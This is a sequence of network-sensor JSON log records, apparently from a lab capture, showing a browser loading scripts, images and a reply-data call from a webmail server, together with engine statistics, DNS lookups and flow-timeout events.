{"timestamp":"2020-02-29T00:27:27.113034+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:27:27.116099+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":6}} {"timestamp":"2020-02-29T00:27:27.116343+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} {"timestamp":"2020-02-29T00:27:27.115958+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.116330+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:27:27.118664+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:27:27.120068+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53188,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:27:27.121899+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":0}} {"timestamp":"2020-02-29T00:27:27.121238+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.121786+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} {"timestamp":"2020-02-29T00:27:27.124589+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.125654+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.165296+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} {"timestamp":"2020-02-29T00:27:27.165341+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} {"timestamp":"2020-02-29T00:27:27.169218+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:27:27.238565+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.238886+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:27:27.240253+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":10}} {"timestamp":"2020-02-29T00:27:27.242259+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:27:27.243179+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":11}} {"timestamp":"2020-02-29T00:27:27.285318+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453}} {"timestamp":"2020-02-29T00:27:30.000182+0000","event_type":"stats","stats":{"uptime":15302,"capture":{"kernel_packets":142700,"kernel_drops":0},"decoder":{"pkts":142763,"bytes":98051560,"invalid":196,"ipv4":141162,"ipv6":10,"ethernet":142763,"raw":0,"null":0,"sll":0,"tcp":135557,"udp":5394,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089568},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2932,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2948,"synack":2939,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":789,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2468,"failed_udp":116},"tx":{"http":5092,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2552}},"flow_mgr":{"closed_pruned":2906,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11550,"memcap_state":0,"memcap_global":0},"http":{"memuse":139966,"memcap":0}}} {"timestamp":"2020-02-29T00:27:30.000939+0000","flow_id":1547093101856505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:29.476921+0000","end":"2020-02-29T00:22:29.588304+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:30.515394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":10}} {"timestamp":"2020-02-29T00:27:30.515611+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} {"timestamp":"2020-02-29T00:27:30.518621+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":11}} {"timestamp":"2020-02-29T00:27:30.518909+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52021,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39633,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:30.546775+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/answered.png","state":"CLOSED","stored":false,"size":453,"tx_id":12}} {"timestamp":"2020-02-29T00:27:30.561472+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484}} {"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.707466+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.753180+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} {"timestamp":"2020-02-29T00:27:32.000618+0000","flow_id":2038445950622291,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:31.449107+0000","end":"2020-02-29T00:22:31.611622+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:32.125265+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53188,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":0}} {"timestamp":"2020-02-29T00:27:32.129074+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":1}} {"timestamp":"2020-02-29T00:27:33.000536+0000","flow_id":1323200751894490,"event_type":"flow","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.557018+0000","end":"2020-02-29T00:22:32.668240+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.000913+0000","flow_id":945608701983486,"event_type":"flow","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:31.998142+0000","end":"2020-02-29T00:22:32.109469+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 